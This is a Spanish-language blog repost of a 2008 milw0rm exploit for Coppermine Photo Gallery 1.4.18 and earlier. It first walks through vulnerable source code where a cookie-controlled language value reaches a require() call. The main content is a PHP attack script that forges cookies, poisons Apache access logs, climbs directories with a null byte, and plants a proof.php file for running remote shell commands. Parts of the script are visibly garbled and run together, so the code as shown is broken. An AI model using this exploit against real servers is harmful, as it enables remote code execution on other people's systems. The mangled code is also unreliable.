miércoles, 6 de agosto de 2008

Coppermine Photo Gallery <= 1.4.18 LFI / Remote Code Execution Exploit 

authenticate();
 
 [...]
 
 301. // Process language selection if present in URI or in user profile or try
 302. // autodetection if default charset is utf-8
 303. if (!empty($_GET['lang']))
 304. {
 305.         $USER['lang'] = ereg("^[a-z0-9_-]*$", $_GET['lang']) ? $_GET['lang'] : $CONFIG['lang'];
 306. }
 307. 
 308. if (isset($USER['lang']) && !strstr($USER['lang'], '/') && file_exists('lang/' . $USER['lang'] . '.php'))
 309. {
 310.         $CONFIG['default_lang'] = $CONFIG['lang'];          // Save default language
 311.         $CONFIG['lang'] = strtr($USER['lang'], '$/\\:*?"\'<>|`', '____________');
 312. }
 313. elseif ($CONFIG['charset'] == 'utf-8') <====== [2]  314. {  315.         include('include/select_lang.inc.php');  316.         if (file_exists('lang/' . $USER['lang'] . '.php'))  317.         {  318.                 $CONFIG['default_lang'] = $CONFIG['lang'];      // Save default language  319.                 $CONFIG['lang'] = $USER['lang'];  320.         }  321. }  322. else  323. {  324.         unset($USER['lang']);  325. }  326.   327. if (isset($CONFIG['default_lang']) && ($CONFIG['default_lang']==$CONFIG['lang']))  328. {  329.                 unset($CONFIG['default_lang']);  330. }  331.   332. if (!file_exists("lang/{$CONFIG['lang']}.php"))  333.   $CONFIG['lang'] = 'english';  334.   335. // We load the chosen language file  336. require "lang/{$CONFIG['lang']}.php"; <======== [3]   if $CONFIG['charset'] is set to 'utf-8' [2] (this is the default configuration), an attacker could be able to  include an arbitrary local file through the require() at line 336 [3], due to $USER array can be manipulate by  cookies (see user_get_profile() function [1] defined into /include/functions.inc.php, near lines 128-146)    [-] Path disclosure in /themes/sample/theme.php    [-] Possible bug fix in /include/functions.inc.php    128. function user_get_profile()  129. {  130.         global $CONFIG, $USER;  131.     132.  if (isset($_COOKIE[$CONFIG['cookie_name'].'_data'])) {  133.   $USER = @unserialize(@base64_decode($_COOKIE[$CONFIG['cookie_name'].'_data']));  134.   $USER['lang'] = ereg("^[a-z0-9_-]*$", $USER['lang']) ? $USER['lang'] : $CONFIG['lang'];  135.         }   */  error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5);  define(STDIN, fopen("php://stdin", "r"));  function http_send($host, $packet) {  $sock = fsockopen($host, 80);  while (!$sock)  {   print "\n[-] No response from {$host}:80 Trying again...";   $sock = fsockopen($host, 80);  }  fputs($sock, $packet);  while (!feof($sock)) $resp .= fread($sock, 1024);  fclose($sock);  return $resp; }  function get_info() {  global $host, $path, $cookie, $version, $path_disc;    $packet  = "GET {$path} HTTP/1.0\r\n";  $packet .= "Host: {$host}\r\n";  $packet .= "Connection: close\r\n\r\n";  $html  = http_send($host, $packet);    preg_match("/Set-Cookie: (.*)_data/", $html, $match);  $cookie = $match[1];    preg_match("/(.*)themes/", http_send($host, $packet), $match);
 $path_disc = $match[1];
}

function get_logs()
{
 $logs[] = "/apache/logs/access.log";
 $logs[] = "/apache2/logs/access.log";
 $logs[] = "/apache/log/access.log";
 $logs[] = "/apache2/log/access.log";
 $logs[] = "/logs/access.log";
 $logs[] = "/var/log/apache/access.log";
 $logs[] = "/var/log/apache2/access.log";
 $logs[] = "/var/log/access.log";
 $logs[] = "/var/www/logs/access.log";
 $logs[] = "/var/www/log/access.log";
 $logs[] = "/var/log/httpd/access.log";
 $logs[] = "/etc/httpd/logs/access.log";
 $logs[] = "/usr/local/apache/logs/access.log";
 $logs[] = "/usr/local/apache2/logs/access.log";
 
 for ($i = 0, $climb = "../.."; $i < packet  = "GET {$path}proof.php HTTP/1.0\r\n" logs =" get_logs();" data =" base64_encode(serialize(array("> md5(time()), "am" => 1, "lang" => $_log.chr(0))));
  
  $packet  = "GET {$path} HTTP/1.0\r\n";
  $packet .= "Host: {$host}\r\n";
  $packet .= "Cookie: {$cookie}_data={$data}\r\n";
  $packet .= "Connection: close\r\n\r\n";
  $resp  = http_send($host, $packet);
  
  if (!preg_match("/f=fopen/", $resp) && preg_match("/_LfI_/", $resp)) return true;
  
  sleep(1);
 }
 
 return false;
}

print "\n+-------------------------------------------------------------------------+";
print "\n| Coppermine Photo Gallery <= 1.4.18 LFI / Code Execution Exploit by EgiX |"; print "\n+-------------------------------------------------------------------------+\n";  if ($argc < host =" $argv[1];" path =" $argv[2];" code =" base64_decode(" packet  = "GET {$path}{$code} HTTP/1.0\r\n" cmd =" trim(fgets(STDIN));" packet = "GET {$path}proof.php HTTP/1.0\r\n">

# milw0rm.com [2008-07-31]
By Unknown en miércoles, agosto 06, 2008
Etiquetas: , ,

No hay comentarios.:

Publicar un comentario

Déjanos tu comentario, nos permitirá mejorar.
¿Qué opinas de este tema?
¿Tienes alguna duda o sugerencia?
¿Te parece adecuado y completo este tema?
¿Falta información? ¿Cual?

Suscribirse a: Comentarios de la entrada (Atom)

Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)